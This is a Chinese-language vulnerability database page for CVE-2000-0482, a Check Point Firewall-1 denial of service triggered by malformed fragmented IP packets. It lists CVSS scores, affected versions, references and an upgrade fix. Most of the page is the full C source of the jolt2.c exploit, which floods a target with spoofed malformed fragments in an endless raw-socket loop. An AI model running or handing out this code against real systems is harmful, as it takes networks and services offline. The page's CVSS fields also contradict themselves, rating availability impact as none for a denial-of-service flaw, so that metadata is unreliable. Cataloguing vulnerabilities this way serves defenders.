CVE-2000-0482
CVSS5.0
发布时间 :2000-06-06 00:00:00
修订时间 :2008-09-10 15:04:47
NMCOE    

[原文]Check Point Firewall-1 allows remote attackers to cause a denial of service by sending a large number of malformed fragmented IP packets.


[CNNVD]Check Point Firewall-1拒绝服务漏洞(CNNVD-200006-024)

        Check Point Firewall-1存在漏洞。远程攻击者通过传送大量的畸形分段的IP包可以导致拒绝服务漏洞。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:checkpoint:firewall-1:4.0Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1Checkpoint Firewall-1 4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0482
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0482
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-024
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1312
(VENDOR_ADVISORY)  BID  1312
http://www.checkpoint.com/techsupport/alerts/list_vun.html#IP_Fragmentation
(UNKNOWN)  CONFIRM  http://www.checkpoint.com/techsupport/alerts/list_vun.html#IP_Fragmentation
http://xforce.iss.net/static/4609.php
(UNKNOWN)  XF  fw1-packet-fragment-dos
http://www.osvdb.org/1379
(UNKNOWN)  OSVDB  1379
http://archives.neohapsis.com/archives/bugtraq/2000-05/0473.html
(UNKNOWN)  BUGTRAQ  20000605 FW-1 IP Fragmentation Vulnerability

- 漏洞信息

Check Point Firewall-1拒绝服务漏洞
中危 未知
2000-06-06 00:00:00 2006-01-04 00:00:00
远程  
        Check Point Firewall-1存在漏洞。远程攻击者通过传送大量的畸形分段的IP包可以导致拒绝服务漏洞。

- 公告与补丁

        

- 漏洞信息 (19994)

Check Point Software Firewall-1 4.0/1 4.1 Fragmented Packets DoS (EDBID:19994)
windows dos
2000-05-23 Verified
0 phonix
N/A [点击下载]
source: http://www.securityfocus.com/bid/1312/info

By sending illegally fragmented packets directly to or routed through Check Point FireWall-1, it is possible to force the firewall to use 100% of available processor time logging these packets. The FireWall-1 rulebase cannot prevent this attack and it is not logged in the firewall logs. 

/*
 * File:   jolt2.c
 * Author: Phonix <phonix@moocow.org>
 * Date:   23-May-00
 *
 * Description: This is the proof-of-concept code for the
 *              Windows denial-of-serice attack described by
 *              the Razor team (NTBugtraq, 19-May-00)
 *              (MS00-029).  This code causes cpu utilization
 *              to go to 100%.
 *
 * Tested against: Win98; NT4/SP5,6; Win2K
 *
 * Written for: My Linux box.  YMMV.  Deal with it.
 *
 * Thanks: This is standard code.  Ripped from lots of places.
 *         Insert your name here if you think you wrote some of
 *         it.  It's a trivial exploit, so I won't take credit
 *         for anything except putting this file together.
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <getopt.h>

struct _pkt
{
  struct iphdr    ip;
  union {
    struct icmphdr  icmp;
    struct udphdr   udp;
  }  proto;
  char data;
} pkt;

int icmplen  = sizeof(struct icmphdr),
    udplen   = sizeof(struct udphdr),
    iplen    = sizeof(struct iphdr),
    spf_sck;

void usage(char *pname)
{
  fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
           pname);
  fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
  exit(0);
}

u_long host_to_ip(char *host_name)
{
  static  u_long ip_bytes;
  struct hostent *res;

  res = gethostbyname(host_name);
  if (res == NULL)
    return (0);
  memcpy(&ip_bytes, res->h_addr, res->h_length);
  return (ip_bytes);
}

void quit(char *reason)
{
  perror(reason);
  close(spf_sck);
  exit(-1);
}

int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
  int     bs, psize;
  unsigned long x;
  struct  sockaddr_in to;

  to.sin_family = AF_INET;
  to.sin_port = 1235;
  to.sin_addr.s_addr = dst_addr;

  if (port)
    psize = iplen + udplen + 1;
  else
    psize = iplen + icmplen + 1;
  memset(&pkt, 0, psize);

  pkt.ip.version = 4;
  pkt.ip.ihl = 5;
  pkt.ip.tot_len = htons(iplen + icmplen) + 40;
  pkt.ip.id = htons(0x455);
  pkt.ip.ttl = 255;
  pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
  pkt.ip.saddr = src_addr;
  pkt.ip.daddr = dst_addr;
  pkt.ip.frag_off = htons (8190);

  if (port)
  {
    pkt.proto.udp.source = htons(port|1235);
    pkt.proto.udp.dest = htons(port);
    pkt.proto.udp.len = htons(9);
    pkt.data = 'a';
  } else {
    pkt.proto.icmp.type = ICMP_ECHO;
    pkt.proto.icmp.code = 0;
    pkt.proto.icmp.checksum = 0;
  }

  while (1) {
    bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
              sizeof(struct sockaddr));
  }
  return bs;
}

int main(int argc, char *argv[])
{
  u_long  src_addr, dst_addr;
  int i, bs=1, port=0;
  char hostname[32];

  if (argc < 2)
    usage (argv[0]);

  gethostname (hostname, 32);
  src_addr = host_to_ip(hostname);

  while ((i = getopt (argc, argv, "s:p:h")) != EOF)
  {
    switch (i)
    {
      case 's':
        dst_addr = host_to_ip(optarg);
        if (!dst_addr)
          quit("Bad source address given.");
        break;

      case 'p':
        port = atoi(optarg);
        if ((port <=0) || (port > 65535))
          quit ("Invalid port number given.");
        break;

      case 'h':
      default:
        usage (argv[0]);
    }
  }

  dst_addr = host_to_ip(argv[argc-1]);
  if (!dst_addr)
    quit("Bad destination address given.");

  spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (!spf_sck)
    quit("socket()");
  if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
      sizeof(bs)) < 0)
    quit("IP_HDRINCL");

  do_frags (spf_sck, src_addr, dst_addr, port);
}
		

- 漏洞信息

1379
Check Point FireWall-1 Fragmented Packet Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Patch / RCS, Upgrade
Exploit Public Third-party Verified

- 漏洞描述

FireWall-1 contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a large amount of incomplete framgented packets, and will result in loss of availability for the platform.

- 时间线

2000-06-05 Unknow
2000-06-05 Unknow

- 解决方案

Upgrade to version 4.0 SP 6, 4.1 SP2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站